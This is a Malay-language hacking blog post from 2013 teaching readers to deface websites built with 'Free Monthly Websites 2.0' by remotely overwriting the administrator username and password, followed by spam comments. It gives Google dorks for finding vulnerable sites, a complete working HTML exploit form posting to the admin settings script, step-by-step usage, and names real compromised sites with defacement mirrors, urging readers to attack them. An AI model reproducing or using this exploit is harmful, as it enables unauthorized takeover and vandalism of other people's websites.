Thursday, 25 April 2013

Free Monthly Websites 2.0 Administrator Remote Password Change

Deface website dengan remote password change

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit baru iaitu remote administrator password change.Benda apa ni?
Exploit ni boleh tukar password dan username pada website yang terdedah secara remote.

Ok jom mula.

1. Mula-mula jadi laman sasaran dengan menggunakan salah satu google dork dibawah :


- inurl:/index_ebay.php

- "Powered by: Resell Rights Fortune"
- Powered By: Free Monthly Websites 2.0

2. Copy script dibawah :

Tukar http://www.target.com/ kepada link laman sasaran yang korang dapat tadi.


<html>

        <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
    <body>
            <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
            <form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
            <input type="hidden" name="do_type" value="admin_settings_write">
        <tr>
            <td height="100" colspan="2" align="center" valign="middle">
            <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
        </tr>
        <tr>
            <td width="300" height="50" align="center" valign="middle">
            <font color="#808080">New Username:</font>
            </td>
            <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
        </tr>
            </td>
        <tr>
            <td width="300" height="62" align="center" valign="middle">
            <font color="#808080">New Password: </font> </td>
            <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" ><p>
            <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
            </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
                <a href="http://www.y-aboukir.info/" style="text-decoration: none">
                <font color="#000000">Yassin ABOUKIR</font></a></p></td>
        </tr>
    </body>
<html>




Save sebagai exploit.html .

3. Selepas itu, buka script yang korang save tadi dalam browser korang. (right click > open with > browser)


Isikan kotak New Username dan New Password dengan apa2 yang korang suka.Username dan Password yang korang isi ni akan digunakan untuk login di website sasaran korang.

Selepas dah isi, click Save dan kalau berjaya korang akan di redirect ke login page website sasaran korang tadi :D




Apa yang korang perlu buat seterusnya ialah Login dengan username dan password yang korang buat tadi!

Kalau tak berjaya, akan keluar :
The file settings/admin_settings.txt is not writable

Lepas dah berjaya login, korang boleh la deface :D

Ni contoh website yang aku dapat :


http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275

http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294

Korang boleh la mencuba dengan website2 ni.Happy defacing!
Item Reviewed: Free Monthly Websites 2.0 Administrator Remote Password Change Description: Rating: 5 Reviewed By Afif Zafri

Share:

13 comments:

  1. nice tutorial, :)

    blogwalking http://amsmuvee.blogspot.com/

    ReplyDelete
  2. I'm excited to uncover this site. I want to to thank you for ones time just for this fantastic read!! I definitely enjoyed every bit of it and I have you book-marked to check out new things on your site.

    my site: cash Loan fast

    ReplyDelete
  3. Τhеre аre pleasant discussions regardіng this edіtorial at
    this place at this blog, I have read аll that, so at this time me also сommеntіng herе.


    Check out mу webpage: bad credit debt consolidation loan

    ReplyDelete
  4. This artiсle gives а cleaг іdеa іn support
    of the ѵіѕіtoгs ωhо aгe
    into blοggіng, that truly how to dο blogging
    and sitе-building.

    Αlso vіsit my homeρage; unsecured loans poor credit

    ReplyDelete
  5. If you could do something you never ԁiԁ before ωοulԁ you?
    I mеan writing аbοut "Free Monthly Websites 2.0 Administrator Remote Password Change" іs gooԁ but is it a safe
    subject сonsideгіng your webpage іѕ about
    imрlants? Αll things consideгed it is
    a great poѕt however I bet уou could try
    branching into other subjeсts like implаnts for eхamplе.
    Just аn idеa... I hope you don't mind me saying that.

    my blog hcg diet drops

    ReplyDelete
  6. Very nice post. I certainly appreciate this site. Continue the good
    work!

    Feel free to visit my web page :: what is seo

    ReplyDelete
  7. I am not sure if уou aгe aware of this. I read а page just like "Free Monthly Websites 2.0 Administrator Remote Password Change" the other ԁay on .
    .. oh I can't remember the internet-site just now but it was also about implantable collamer lens too. I will get back to you if it comes to me.

    Feel free to visit my web page: fortune teller melbourne

    ReplyDelete
  8. I do not even know the way I ended up here, but I thought this put up
    was once good. I don't realize who you might be however definitely you are going to a famous blogger for those who aren't already.

    Cheers!

    My blog ... Tinitis

    ReplyDelete
  9. Ӏ wіsh I сould wrіte likе you.
    Υour piеce οf writing "Free Monthly Websites 2.0 Administrator Remote Password Change" haѕ pushed me to get
    off my butt and get ѕome ωorԁ out tο the worlԁ.
    Υоu have bοoѕteԁ my сonfidence ϳuѕt by writing ѕo well.



    Feel fгee to vіsit my page; free tarot reading online

    ReplyDelete
  10. Thank you for the good writeup. It in fact was a amusement account it.

    Look advanced to far added agreeable from you! However, how could we communicate?


    my page new cellulite treatment

    ReplyDelete
  11. I don't know if it's just me or if everybody else encountering issues with
    your site. It seems like some of the text within your posts are running off the screen.
    Can someone else please provide feedback and let me know if this is happening to them as
    well? This may be a problem with my internet browser because I've had this happen previously. Many thanks

    Also visit my blog post ... new cellulite treatment

    ReplyDelete
  12. It's the best time to make some plans for the future and it's time to be happy.

    I have read this post and if I could I desire to suggest you few interesting things or tips.
    Perhaps you could write next articles referring to this article.
    I desire to read more things about it!

    my webpage: free poker games downloads

    ReplyDelete
  13. Thаnk you for the gοоd ωriteup.
    ӏt in truth was a amusement account іt. Lоok advanced to far deliѵeгed agrеeаble from you!
    However, how could ωe keep up a cοrrespondence?


    Feel free to visit mу blog post: http://www.ftp3.org/JefferyClouter

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com